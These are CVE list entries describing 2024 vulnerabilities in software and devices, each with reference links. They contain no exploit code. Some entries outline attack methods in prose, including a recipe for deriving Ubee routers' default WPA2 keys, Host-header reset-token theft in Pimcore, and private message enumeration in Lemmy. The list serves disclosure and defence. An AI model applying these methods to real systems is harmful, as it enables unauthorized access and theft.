CVE 2024 23731 Candidate The OpenAPI loader in Embedchain before 0.1.57 allows attackers to execute arbitrary code, related to the openapi.py yaml.load function argument. MISC:https://github.com/embedchain/embedchain/compare/0.1.56...0.1.57 | MISC:https://github.com/embedchain/embedchain/pull/1122 Assigned (20240121)
CVE 2024 23730 Candidate The OpenAPI and ChatGPT plugin loaders in LlamaHub (aka llama-hub) before 0.0.67 allow attackers to execute arbitrary code because safe_load is not used for YAML. MISC:https://github.com/run-llama/llama-hub/blob/v0.0.67/CHANGELOG.md | MISC:https://github.com/run-llama/llama-hub/pull/841/commits/9dc9c21a5c6d0226d1d2101c3121d4f085743d52 | MISC:https://github.com/run-llama/llama-hub/releases/tag/v0.0.67 Assigned (20240121)
CVE 2024 23726 Candidate Ubee DDW365 XCNDDW365 devices have predictable default WPA2 PSKs that could lead to unauthorized remote access. A remote attacker (in proximity to a Wi-Fi network) can derive the default WPA2-PSK value by observing a beacon frame. A PSK is generated by using the first six characters of the SSID and the last six of the BSSID, decrementing the last digit. MISC:https://github.com/actuator/cve/blob/main/Ubee/CWE-1392.md Assigned (20240121)
CVE 2024 23725 Candidate Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries. MISC:https://github.com/TryGhost/Ghost/pull/17190 | MISC:https://github.com/TryGhost/Ghost/releases/tag/v5.76.0 Assigned (20240121)
CVE 2024 23724 Candidate ** DISPUTED ** Ghost through 5.76.0 allows stored XSS, and resultant privilege escalation in which a contributor can take over any account, via an SVG profile picture that contains JavaScript code to interact with the API on localhost TCP port 3001. NOTE: The discoverer reports that "The vendor does not view this as a valid vector." MISC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2024-23724 | MISC:https://github.com/TryGhost/Ghost/pull/19646 | MISC:https://rhinosecuritylabs.com/blog/ Assigned (20240121)
CVE 2024 23721 Candidate A Directory Traversal issue was discovered in process_post on Draytek Vigor3910 4.3.2.5 devices. When sending a certain POST request, it calls the function and exports information. MISC:https://draytek.com | MISC:https://gist.github.com/rrrrrrri/8e9cac08eb4d9c01ab258bd5b0f8f7d8 Assigned (20240120)
CVE 2024 23717 Candidate In access_secure_service_from_temp_bond of btm_sec.cc, there is a possible way to achieve keystroke injection due to improper input validation. This could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/c5c528beb6e1cfed3ec93a3a264084df32ce83c2 | URL:https://android.googlesource.com/platform/packages/modules/Bluetooth/+/c5c528beb6e1cfed3ec93a3a264084df32ce83c2 | MISC:https://source.android.com/security/bulletin/2024-03-01 | URL:https://source.android.com/security/bulletin/2024-03-01 Assigned (20240120)
CVE 2024 2371 Candidate Information exposure vulnerability in Korenix JetI/O 6550 affecting firmware version F208 Build:0817. The SNMP protocol uses plaintext to transfer data, allowing an attacker to intercept traffic and retrieve credentials. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/information-exposure-vulnerability-korenix-jetio-6550 | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/information-exposure-vulnerability-korenix-jetio-6550 Assigned (20240311)
CVE 2024 2370 Candidate ** REJECT ** DO NOT USE THIS CVE ID NUMBER. Consult IDs: CVE-2018-5341. Reason: This CVE Record is a duplicate of CVE-2018-5341. Notes: All CVE users should reference CVE-2018-5341 instead of this record. Assigned (20240311)
CVE 2024 23689 Candidate Exposure of sensitive information in exceptions in ClichHouse's clickhouse-r2dbc, com.clickhouse:clickhouse-jdbc, and com.clickhouse:clickhouse-client versions less than 0.4.6 allows unauthorized users to gain access to client certificate passwords via client exception logs. This occurs when 'sslkey' is specified and an exception, such as a ClickHouseException or SQLException, is thrown during database operations; the certificate password is then included in the logged exception message. MISC:https://github.com/ClickHouse/clickhouse-java/issues/1331 | URL:https://github.com/ClickHouse/clickhouse-java/issues/1331 | MISC:https://github.com/ClickHouse/clickhouse-java/pull/1334 | URL:https://github.com/ClickHouse/clickhouse-java/pull/1334 | MISC:https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6 | URL:https://github.com/ClickHouse/clickhouse-java/releases/tag/v0.4.6 | MISC:https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r | URL:https://github.com/ClickHouse/clickhouse-java/security/advisories/GHSA-g8ph-74m6-8m7r | MISC:https://github.com/advisories/GHSA-g8ph-74m6-8m7r | URL:https://github.com/advisories/GHSA-g8ph-74m6-8m7r | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-g8ph-74m6-8m7r Assigned (20240119)
CVE 2024 23688 Candidate Consensys Discovery versions less than 0.4.5 uses the same AES/GCM nonce for the entire session. which should ideally be unique for every message. The node's private key isn't compromised, only the session key generated for specific peer communication is exposed. MISC:https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g | URL:https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g | MISC:https://github.com/advisories/GHSA-w3hj-wr2q-x83g | URL:https://github.com/advisories/GHSA-w3hj-wr2q-x83g | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-w3hj-wr2q-x83g Assigned (20240119)
CVE 2024 23687 Candidate Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allows unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines. MISC:https://github.com/advisories/GHSA-vf78-3q9f-92g3 | URL:https://github.com/advisories/GHSA-vf78-3q9f-92g3 | MISC:https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446 | URL:https://github.com/folio-org/mod-data-export-spring/commit/93aff4566bff59e30f4121b5a2bda5b0b508a446 | MISC:https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3 | URL:https://github.com/folio-org/mod-data-export-spring/security/advisories/GHSA-vf78-3q9f-92g3 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-vf78-3q9f-92g3 | MISC:https://wiki.folio.org/x/hbMMBw | URL:https://wiki.folio.org/x/hbMMBw Assigned (20240119)
CVE 2024 23686 Candidate DependencyCheck for Maven 9.0.0 to 9.0.6, for CLI version 9.0.0 to 9.0.5, and for Ant versions 9.0.0 to 9.0.5, when used in debug mode, allows an attacker to recover the NVD API Key from a log file. MISC:https://github.com/advisories/GHSA-qqhq-8r2c-c3f5 | URL:https://github.com/advisories/GHSA-qqhq-8r2c-c3f5 | MISC:https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5 | URL:https://github.com/jeremylong/DependencyCheck/security/advisories/GHSA-qqhq-8r2c-c3f5 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-qqhq-8r2c-c3f5 Assigned (20240119)
CVE 2024 23685 Candidate Hard-coded credentials in mod-remote-storage versions under 1.7.2 and from 2.0.0 to 2.0.3 allows unauthorized users to gain read access to mod-inventory-storage records including instances, holdings, items, contributor-types, and identifier-types. MISC:https://github.com/advisories/GHSA-m8v7-469p-5x89 | URL:https://github.com/advisories/GHSA-m8v7-469p-5x89 | MISC:https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b | URL:https://github.com/folio-org/mod-remote-storage/commit/57df495f76e9aa5be9ce7ce3a65f89b6dbcbc13b | MISC:https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89 | URL:https://github.com/folio-org/mod-remote-storage/security/advisories/GHSA-m8v7-469p-5x89 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-m8v7-469p-5x89 | MISC:https://wiki.folio.org/x/hbMMBw | URL:https://wiki.folio.org/x/hbMMBw Assigned (20240119)
CVE 2024 23684 Candidate Inefficient algorithmic complexity in DecodeFromBytes function in com.upokecenter.cbor Java implementation of Concise Binary Object Representation (CBOR) versions 4.0.0 to 4.5.1 allows an attacker to cause a denial of service by passing a maliciously crafted input. Depending on an application's use of this library, this may be a remote attacker. MISC:https://github.com/advisories/GHSA-fj2w-wfgv-mwq6 | URL:https://github.com/advisories/GHSA-fj2w-wfgv-mwq6 | MISC:https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6 | URL:https://github.com/peteroupc/CBOR-Java/security/advisories/GHSA-fj2w-wfgv-mwq6 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-fj2w-wfgv-mwq6 Assigned (20240119)
CVE 2024 23683 Candidate Artemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. MISC:https://github.com/advisories/GHSA-883x-6fch-6wjx | URL:https://github.com/advisories/GHSA-883x-6fch-6wjx | MISC:https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392 | URL:https://github.com/ls1intum/Ares/commit/af4f28a56e2fe600d8750b3b415352a0a3217392 | MISC:https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371 | URL:https://github.com/ls1intum/Ares/issues/15#issuecomment-996449371 | MISC:https://github.com/ls1intum/Ares/releases/tag/1.7.6 | URL:https://github.com/ls1intum/Ares/releases/tag/1.7.6 | MISC:https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx | URL:https://github.com/ls1intum/Ares/security/advisories/GHSA-883x-6fch-6wjx | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-883x-6fch-6wjx Assigned (20240119)
CVE 2024 23682 Candidate Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. MISC:https://github.com/advisories/GHSA-227w-wv4j-67h4 | URL:https://github.com/advisories/GHSA-227w-wv4j-67h4 | MISC:https://github.com/ls1intum/Ares/issues/15 | URL:https://github.com/ls1intum/Ares/issues/15 | MISC:https://github.com/ls1intum/Ares/releases/tag/1.8.0 | URL:https://github.com/ls1intum/Ares/releases/tag/1.8.0 | MISC:https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4 | URL:https://github.com/ls1intum/Ares/security/advisories/GHSA-227w-wv4j-67h4 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-227w-wv4j-67h4 Assigned (20240119)
CVE 2024 23681 Candidate Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code. MISC:https://github.com/advisories/GHSA-98hq-4wmw-98w9 | URL:https://github.com/advisories/GHSA-98hq-4wmw-98w9 | MISC:https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9 | URL:https://github.com/ls1intum/Ares/security/advisories/GHSA-98hq-4wmw-98w9 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-98hq-4wmw-98w9 Assigned (20240119)
CVE 2024 23680 Candidate AWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures. MISC:https://github.com/advisories/GHSA-55xh-53m6-936r | URL:https://github.com/advisories/GHSA-55xh-53m6-936r | MISC:https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r | URL:https://github.com/aws/aws-encryption-sdk-java/security/advisories/GHSA-55xh-53m6-936r | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-55xh-53m6-936r Assigned (20240119)
CVE 2024 23679 Candidate Enonic XP versions less than 7.7.4 are vulnerable to a session fixation issue. An remote and unauthenticated attacker can use prior sessions due to the lack of invalidating session attributes. MISC:https://github.com/advisories/GHSA-4m5p-5w5w-3jcf | URL:https://github.com/advisories/GHSA-4m5p-5w5w-3jcf | MISC:https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff | URL:https://github.com/enonic/xp/commit/0189975691e9e6407a9fee87006f730e84f734ff | MISC:https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4 | URL:https://github.com/enonic/xp/commit/1f44674eb9ab3fbab7103e8d08067846e88bace4 | MISC:https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842 | URL:https://github.com/enonic/xp/commit/2abac31cec8679074debc4f1fb69c25930e40842 | MISC:https://github.com/enonic/xp/issues/9253 | URL:https://github.com/enonic/xp/issues/9253 | MISC:https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf | URL:https://github.com/enonic/xp/security/advisories/GHSA-4m5p-5w5w-3jcf | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-4m5p-5w5w-3jcf Assigned (20240119)
CVE 2024 23678 Candidate In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data. This results in the unsafe deserialization of untrusted data from a separate disk partition on the machine. This vulnerability only affects Splunk Enterprise for Windows. MISC:https://advisory.splunk.com/advisories/SVD-2024-0108 | URL:https://advisory.splunk.com/advisories/SVD-2024-0108 | MISC:https://research.splunk.com/application/947d4d2e-1b64-41fc-b32a-736ddb88ce97/ | URL:https://research.splunk.com/application/947d4d2e-1b64-41fc-b32a-736ddb88ce97/ Assigned (20240119)
CVE 2024 23677 Candidate In Splunk Enterprise versions below 9.0.8, the Splunk RapidDiag utility discloses server responses from external applications in a log file. MISC:https://advisory.splunk.com/advisories/SVD-2024-0107 | URL:https://advisory.splunk.com/advisories/SVD-2024-0107 Assigned (20240119)
CVE 2024 23676 Candidate In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit. MISC:https://advisory.splunk.com/advisories/SVD-2024-0106 | URL:https://advisory.splunk.com/advisories/SVD-2024-0106 | MISC:https://research.splunk.com/application/ee69374a-d27e-4136-adac-956a96ff60fd/ | URL:https://research.splunk.com/application/ee69374a-d27e-4136-adac-956a96ff60fd/ Assigned (20240119)
CVE 2024 23675 Candidate In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections. MISC:https://advisory.splunk.com/advisories/SVD-2024-0105 | URL:https://advisory.splunk.com/advisories/SVD-2024-0105 | MISC:https://research.splunk.com/application/8f0e8380-a835-4f2b-b749-9ce119364df0/ | URL:https://research.splunk.com/application/8f0e8380-a835-4f2b-b749-9ce119364df0/ Assigned (20240119)
CVE 2024 23674 Candidate The Online-Ausweis-Funktion eID scheme in the German National Identity card through 2024-02-15 allows authentication bypass by spoofing. A man-in-the-middle attacker can assume a victim's identify for access to government, medical, and financial resources, and can also extract personal data from the card, aka the "sPACE (Spoofing Password Authenticated Connection Establishment)" issue. This occurs because of a combination of factors, such as insecure PIN entry (for basic readers) and eid:// deeplinking. The victim must be using a modified eID kernel, which may occur if the victim is tricked into installing a fake version of an official app. NOTE: the BSI position is "ensuring a secure operational environment at the client side is an obligation of the ID card owner." MISC:https://ctrlalt.medium.com/space-attack-spoofing-eids-password-authenticated-connection-establishment-11561e5657b1 | MISC:https://www.ausweisapp.bund.de/ | MISC:https://www.dropbox.com/scl/fi/2powlii0dnmr7p7v5ijhc/2024_German_eID_02_Spoofing_PACE_final.pdf?rlkey=nx0ffmmbq3hffgxsuqwf0f45z&dl=0 | MISC:https://www.personalausweisportal.de/ Assigned (20240119)
CVE 2024 23673 Candidate Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.This issue affects all version of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system. If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script. Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not. MISC:https://lists.apache.org/thread/5zzx8ztwc6tmbwlw80m2pbrp3913l2kl | URL:https://lists.apache.org/thread/5zzx8ztwc6tmbwlw80m2pbrp3913l2kl | MLIST:[oss-security] 20240206 CVE-2024-23673: Apache Sling Servlets Resolver: Malicious code execution via path traversal | URL:http://www.openwall.com/lists/oss-security/2024/02/06/1 Assigned (20240119)
CVE 2024 23672 Candidate Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue. MISC:https://lists.apache.org/thread/cmpswfx6tj4s7x0nxxosvfqs11lvdx2f | URL:https://lists.apache.org/thread/cmpswfx6tj4s7x0nxxosvfqs11lvdx2f Assigned (20240119)
CVE 2024 23660 Candidate The Binance Trust Wallet app for iOS in commit 3cd6e8f647fbba8b5d8844fcd144365a086b629f, git tag 0.0.4 misuses the trezor-crypto library and consequently generates mnemonic words for which the device time is the only entropy source, leading to economic losses, as exploited in the wild in July 2023. An attacker can systematically generate mnemonics for each timestamp within an applicable timeframe, and link them to specific wallet addresses in order to steal funds from those wallets. MISC:https://milksad.info/posts/research-update-5/ | MISC:https://secbit.io/blog/en/2024/01/19/trust-wallets-fomo3d-summer-vuln/ Assigned (20240119)
CVE 2024 23659 Candidate SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js. MISC:https://blog.spip.net/Mise-a-jour-de-maintenance-et-securite-sortie-de-SPIP-4-2-8-SPIP-4-1-14.html?lang=fr | MISC:https://git.spip.net/spip/bigup/commit/0757f015717cb72b84dba0e9a375ec71caddf1c2 | MISC:https://git.spip.net/spip/bigup/commit/ada821c076d67d1147a195178223d0b4a6d8cecc Assigned (20240119)
CVE 2024 23656 Candidate Dex is an identity service that uses OpenID Connect to drive authentication for other apps. Dex 2.37.0 serves HTTPS with insecure TLS 1.0 and TLS 1.1. `cmd/dex/serve.go` line 425 seemingly sets TLS 1.2 as minimum version, but the whole `tlsConfig` is ignored after `TLS cert reloader` was introduced in v2.37.0. Configured cipher suites are not respected either. This issue is fixed in Dex 2.38.0. MISC:https://github.com/dexidp/dex/blob/70d7a2c7c1bb2646b1a540e49616cbc39622fb83/cmd/dex/serve.go#L425 | URL:https://github.com/dexidp/dex/blob/70d7a2c7c1bb2646b1a540e49616cbc39622fb83/cmd/dex/serve.go#L425 | MISC:https://github.com/dexidp/dex/commit/5bbdb4420254ba73b9c4df4775fe7bdacf233b17 | URL:https://github.com/dexidp/dex/commit/5bbdb4420254ba73b9c4df4775fe7bdacf233b17 | MISC:https://github.com/dexidp/dex/issues/2848 | URL:https://github.com/dexidp/dex/issues/2848 | MISC:https://github.com/dexidp/dex/pull/2964 | URL:https://github.com/dexidp/dex/pull/2964 | MISC:https://github.com/dexidp/dex/security/advisories/GHSA-gr79-9v6v-gc9r | URL:https://github.com/dexidp/dex/security/advisories/GHSA-gr79-9v6v-gc9r Assigned (20240119)
CVE 2024 23655 Candidate Tuta is an encrypted email service. Starting in version 3.118.12 and prior to version 3.119.10, an attacker is able to send a manipulated email so that the user can no longer use the app to get access to received emails. By sending a manipulated email, an attacker could put the app into an unusable state. In this case, a user can no longer access received e-mails. Since the vulnerability affects not only the app, but also the web application, a user in this case has no way to access received emails. This issue was tested with iOS and the web app, but it is possible all clients are affected. Version 3.119.10 fixes this issue. MISC:https://github.com/tutao/tutanota/releases/tag/tutanota-release-3.119.10 | URL:https://github.com/tutao/tutanota/releases/tag/tutanota-release-3.119.10 | MISC:https://github.com/tutao/tutanota/security/advisories/GHSA-5h47-g927-629g | URL:https://github.com/tutao/tutanota/security/advisories/GHSA-5h47-g927-629g Assigned (20240119)
CVE 2024 23654 Candidate discourse-ai is the AI plugin for the open-source discussion platform Discourse. Prior to commit 94ba0dadc2cf38e8f81c3936974c167219878edd, interactions with different AI services are vulnerable to admin-initiated SSRF attacks. Versions of the plugin that include commit 94ba0dadc2cf38e8f81c3936974c167219878edd contain a patch. As a workaround, one may disable the discourse-ai plugin. MISC:https://github.com/discourse/discourse-ai/commit/94ba0dadc2cf38e8f81c3936974c167219878edd | URL:https://github.com/discourse/discourse-ai/commit/94ba0dadc2cf38e8f81c3936974c167219878edd | MISC:https://github.com/discourse/discourse-ai/security/advisories/GHSA-32cj-rm2q-22cc | URL:https://github.com/discourse/discourse-ai/security/advisories/GHSA-32cj-rm2q-22cc Assigned (20240119)
CVE 2024 23653 Candidate BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. In addition to running containers as build steps, BuildKit also provides APIs for running interactive containers based on built images. It was possible to use these APIs to ask BuildKit to run a container with elevated privileges. Normally, running such containers is only allowed if special `security.insecure` entitlement is enabled both by buildkitd configuration and allowed by the user initializing the build request. The issue has been fixed in v0.12.5 . Avoid using BuildKit frontends from untrusted sources. MISC:https://github.com/moby/buildkit/pull/4602 | URL:https://github.com/moby/buildkit/pull/4602 | MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5 | URL:https://github.com/moby/buildkit/releases/tag/v0.12.5 | MISC:https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g | URL:https://github.com/moby/buildkit/security/advisories/GHSA-wr6v-9f75-vh2g Assigned (20240119)
CVE 2024 23652 Candidate BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit frontend or Dockerfile using RUN --mount could trick the feature that removes empty files created for the mountpoints into removing a file outside the container, from the host system. The issue has been fixed in v0.12.5. Workarounds include avoiding using BuildKit frontends from an untrusted source or building an untrusted Dockerfile containing RUN --mount feature. MISC:https://github.com/moby/buildkit/pull/4603 | URL:https://github.com/moby/buildkit/pull/4603 | MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5 | URL:https://github.com/moby/buildkit/releases/tag/v0.12.5 | MISC:https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8 | URL:https://github.com/moby/buildkit/security/advisories/GHSA-4v98-7qmw-rqr8 Assigned (20240119)
CVE 2024 23651 Candidate BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Two malicious build steps running in parallel sharing the same cache mounts with subpaths could cause a race condition that can lead to files from the host system being accessible to the build container. The issue has been fixed in v0.12.5. Workarounds include, avoiding using BuildKit frontend from an untrusted source or building an untrusted Dockerfile containing cache mounts with --mount=type=cache,source=... options. MISC:https://github.com/moby/buildkit/pull/4604 | URL:https://github.com/moby/buildkit/pull/4604 | MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5 | URL:https://github.com/moby/buildkit/releases/tag/v0.12.5 | MISC:https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv | URL:https://github.com/moby/buildkit/security/advisories/GHSA-m3r6-h7wv-7xxv Assigned (20240119)
CVE 2024 23650 Candidate BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. A malicious BuildKit client or frontend could craft a request that could lead to BuildKit daemon crashing with a panic. The issue has been fixed in v0.12.5. As a workaround, avoid using BuildKit frontends from untrusted sources. MISC:https://github.com/moby/buildkit/pull/4601 | URL:https://github.com/moby/buildkit/pull/4601 | MISC:https://github.com/moby/buildkit/releases/tag/v0.12.5 | URL:https://github.com/moby/buildkit/releases/tag/v0.12.5 | MISC:https://github.com/moby/buildkit/security/advisories/GHSA-9p26-698r-w4hx | URL:https://github.com/moby/buildkit/security/advisories/GHSA-9p26-698r-w4hx Assigned (20240119)
CVE 2024 2365 Candidate A vulnerability classified as problematic was found in Musicshelf 1.0/1.1 on Android. Affected by this vulnerability is an unknown functionality of the file io\fabric\sdk\android\services\network\PinningTrustManager.java of the component SHA-1 Handler. The manipulation leads to password hash with insufficient computational effort. It is possible to launch the attack on the physical device. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-256321 was assigned to this vulnerability. MISC:VDB-256321 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.256321 | MISC:VDB-256321 | Musicshelf SHA-1 PinningTrustManager.java weak password hash | URL:https://vuldb.com/?id.256321 | MISC:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Weak_Hashing_Algorithms.md | URL:https://github.com/ctflearner/Android_Findings/blob/main/Musicshelf/Weak_Hashing_Algorithms.md Assigned (20240310)
CVE 2024 23649 Candidate Lemmy is a link aggregator and forum for the fediverse. Starting in version 0.17.0 and prior to version 0.19.1, users can report private messages, even when they're neither sender nor recipient of the message. The API response to creating a private message report contains the private message itself, which means any user can just iterate over message ids to (loudly) obtain all private messages of an instance. A user with instance admin privileges can also abuse this if the private message is removed from the response, as they're able to see the resulting reports. Creating a private message report by POSTing to `/api/v3/private_message/report` does not validate whether the reporter is the recipient of the message. lemmy-ui does not allow the sender to report the message; the API method should likely be restricted to accessible to recipients only. The API response when creating a report contains the `private_message_report_view` with all the details of the report, including the private message that has been reported: Any authenticated user can obtain arbitrary (untargeted) private message contents. Privileges required depend on the instance configuration; when registrations are enabled without application system, the privileges required are practically none. When registration applications are required, privileges required could be considered low, but this assessment heavily varies by instance. Version 0.19.1 contains a patch for this issue. A workaround is available. If an update to a fixed Lemmy version is not immediately possible, the API route can be blocked in the reverse proxy. This will prevent anyone from reporting private messages, but it will also prevent exploitation before the update has been applied. MISC:https://github.com/LemmyNet/lemmy/commit/bc32b408b523b9b64aa57b8e47748f96cce0dae5 | URL:https://github.com/LemmyNet/lemmy/commit/bc32b408b523b9b64aa57b8e47748f96cce0dae5 | MISC:https://github.com/LemmyNet/lemmy/security/advisories/GHSA-r64r-5h43-26qv | URL:https://github.com/LemmyNet/lemmy/security/advisories/GHSA-r64r-5h43-26qv Assigned (20240119)
CVE 2024 23648 Candidate Pimcore's Admin Classic Bundle provides a backend user interface for Pimcore. The password reset functionality sends to the the user requesting a password change an email containing an URL to reset its password. The URL sent contains a unique token, valid during 24 hours, allowing the user to reset its password. This token is highly sensitive ; as an attacker able to retrieve it would be able to resets the user's password. Prior to version 1.2.3, the reset-password URL is crafted using the "Host" HTTP header of the request sent to request a password reset. This way, an external attacker could send password requests for users, but specify a "Host" header of a website that they control. If the user receiving the mail clicks on the link, the attacker would retrieve the reset token of the victim and perform account takeover. Version 1.2.3 fixes this issue. MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/70f2205b5a5ea9584721d4f3e803f4d0dd5e4655 | URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/70f2205b5a5ea9584721d4f3e803f4d0dd5e4655 | MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-mrqg-mwh7-q94j | URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-mrqg-mwh7-q94j Assigned (20240119)
CVE 2024 23647 Candidate Authentik is an open-source Identity Provider. There is a bug in our implementation of PKCE that allows an attacker to circumvent the protection that PKCE offers. PKCE adds the code_challenge parameter to the authorization request and adds the code_verifier parameter to the token request. Prior to 2023.8.7 and 2023.10.7, a downgrade scenario is possible: if the attacker removes the code_challenge parameter from the authorization request, authentik will not do the PKCE check. Because of this bug, an attacker can circumvent the protection PKCE offers, such as CSRF attacks and code injection attacks. Versions 2023.8.7 and 2023.10.7 fix the issue. MISC:https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a | URL:https://github.com/goauthentik/authentik/commit/38e04ae12720e5d81b4f7ac77997eb8d1275d31a | MISC:https://github.com/goauthentik/authentik/security/advisories/GHSA-mrx3-gxjx-hjqj | URL:https://github.com/goauthentik/authentik/security/advisories/GHSA-mrx3-gxjx-hjqj Assigned (20240119)
